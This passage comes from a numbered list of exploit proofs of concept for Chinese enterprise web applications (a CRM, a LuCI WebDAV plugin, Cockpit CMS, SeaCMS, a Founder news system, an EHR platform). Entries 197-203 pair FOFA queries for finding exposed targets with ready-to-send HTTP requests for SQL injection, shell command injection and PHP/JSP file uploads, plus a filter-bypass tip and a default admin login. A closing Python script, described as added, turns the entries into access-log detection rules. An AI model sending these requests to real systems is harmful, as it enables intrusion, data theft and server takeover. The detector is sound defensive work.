197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
The ;.js suffix is a Java path parameter, the usual way of slipping past extension-based access filters; keep it when reproducing.
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV (aliyundrive-webdav LuCI app) command injection
CVE-2024-29640
The sid value is percent-encoded; it decodes to `ls />/www/aaa.txt` (backticks included), so the listing is written to /www/aaa.txt. Note the sysauth cookie: the request runs inside an authenticated LuCI session.
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager/upload file upload
FOFA:title="Authenticate Please!"

Step 1: fetch the CSRF token from the login page:
GET /auth/login?to=/ HTTP/1.1

Response: 200, containing csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

Step 2: use the JWT from step 1 to obtain a session cookie (the PoC logs in as admin/admin):

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

Step 3: upload with the session cookie. Because a valid login is required, this is an authenticated upload whose weakness is the missing extension check, so exposure depends on how guessable the admin credentials are.
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

The uploaded file is then reachable at:
/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) all-media news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
The TableName value is concatenated into the query; decoded it reads: DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Step 1: fetch the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Step 2: substitute the __VIEWSTATE and __EVENTVALIDATION values into the request below (the two placeholders of the same name). The bttnUpload value 上传图片 is the button caption and is sent as-is.
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is then reachable at:
/_data/Uploads/1123.txt

203. 红海云 EHR PtFjk file upload
FOFA:body="RedseaPlatform"
The part declares image/jpeg while the filename ends in .jsp; the PoC relies on the extension not being checked.
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

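For the defensive use this list was published for, the entries above translate directly into access-log hunting rules. The Python below is an added example, not from the original post: it parses Combined Log Format lines, URL-decodes the request target repeatedly (double encoding otherwise hides a payload), and matches the endpoint of each entry plus, where the PoC carries it in the URL, the payload itself. Entries whose payload rides in a POST body (190, 191, 193, 194, 195, 196, 201 and the uploads) can only be matched on the endpoint here, which is a lead to pull the body from a proxy or WAF rather than a confirmation. The rule set is an assumption derived from the paths listed above, and the sample log lines are constructed for the demo.

```python
"""Added example: hunt for the requests in this list in Combined Log Format access
logs, decoding the URL before matching. Not part of the original post."""
import re
import urllib.parse
from dataclasses import dataclass
from typing import List, Optional

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')


@dataclass(frozen=True)
class Rule:
    entry: str                     # number of the entry in this list
    path: str                      # regex over the RAW path: /../ and ;.js must stay visible
    payload: Optional[str] = None  # regex over the decoded URL; None = payload rides in the body
    methods: tuple = ("GET", "POST")


# Where the payload travels in a POST body (uploads, commands, JSON) an access log only
# shows the endpoint: a lead to pull the body from a proxy or WAF, not a confirmation.
RULES = [
    Rule("187", r"^/index\.cfm/_api/json/v1/default/\?method=processAsyncObject", None, ("POST",)),
    Rule("188", r"^/attachment\?", r"file=(/|\.\./)"),
    Rule("189", r"^/xds/deleteStudy\.php", r"waitfor\s+delay"),
    Rule("190", r"^/index\.php/admin/Userinfo/poihuoqu", None, ("POST",)),
    Rule("191", r"^/CDGServer3/js/\.\./NavigationAjax", None, ("POST",)),
    Rule("192", r"^/JoinfApp/EMail/UploadEmailAttr\?name=\.ashx", None, ("POST",)),
    Rule("193", r"^/master/ajaxActions/setSystemTimeAction\.php", None, ("POST",)),
    Rule("194", r"^/servlet/uploadAttachmentServlet", None, ("POST",)),
    Rule("195", r"^/send_order\.cgi\?parameter=operation", None, ("POST",)),
    Rule("196", r"^/cas/userCtl/resetPasswordBySuper", None, ("POST",)),
    Rule("197", r"Quotegask_editAction\.entweb", r"union\s+(all\s+)?select"),
    Rule("198", r"^/cgi-bin/luci/admin/services/aliyundrive-webdav/query", r"sid=[^&]*(`|\$\(|;|\|)"),
    Rule("199", r"^/assetsmanager/upload", None, ("POST",)),
    Rule("200", r"^/js/player/dmplayer/dmku/", r"sleep\("),
    Rule("201", r"^/newsedit/newsplan/task/binary\.do", None, ("POST",)),
    Rule("203", r"^/RedseaPlatform/PtFjk\.mob\?method=upload", None, ("POST",)),
]

# Catch-all for the payload shapes used throughout the list, on any path.
GENERIC = re.compile(r"/etc/passwd|file://|sleep\(|waitfor\s+delay|union\s+(all\s+)?select"
                     r"|randomblob\(|`|\$\(", re.I)


def decode_fully(s: str, max_rounds: int = 3) -> str:
    """URL-decode until stable, so %2527-style double encoding cannot hide a payload."""
    for _ in range(max_rounds):
        nxt = urllib.parse.unquote_plus(s)
        if nxt == s:
            break
        s = nxt
    return s


@dataclass(frozen=True)
class Hit:
    entry: str   # rule number, or "generic"
    level: str   # "payload" (attack string seen in the URL) or "endpoint" (body not logged)
    ip: str
    target: str


def scan_line(line: str) -> List[Hit]:
    m = LOG_RE.match(line)
    if not m:
        return []
    target, decoded = m["target"], decode_fully(m["target"])
    hits = []
    for rule in RULES:
        if m["method"] not in rule.methods or not re.search(rule.path, target, re.I):
            continue
        if rule.payload is None:
            hits.append(Hit(rule.entry, "endpoint", m["ip"], target))
        elif re.search(rule.payload, decoded, re.I):
            hits.append(Hit(rule.entry, "payload", m["ip"], target))
    if not hits and GENERIC.search(decoded):
        hits.append(Hit("generic", "payload", m["ip"], target))
    return hits


def scan(lines) -> List[Hit]:
    return [hit for line in lines for hit in scan_line(line)]


# Constructed sample: five PoCs from the list, one benign request, one double-encoded traversal.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Jun/2024:07:41:01 +0800] "GET /attachment?file=/etc/passwd HTTP/1.1" 200 1375 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jun/2024:07:41:02 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jun/2024:07:41:03 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1" 200 2 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jun/2024:07:41:04 +0800] "GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1" 200 40 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jun/2024:07:41:05 +0800] "POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Jun/2024:07:41:06 +0800] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jun/2024:07:41:07 +0800] "GET /download?f=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(f"{hit.level:8} entry {hit.entry:7} {hit.ip:13} {hit.target}")
```

Run it against real logs with scan(open(path)); the raw path is matched before decoding on purpose, because the /js/../ of entry 191 and the ;.js of entry 197 are exactly what a normalised view would erase, and a 404 on a generic hit (the last sample line) still tells you who is probing.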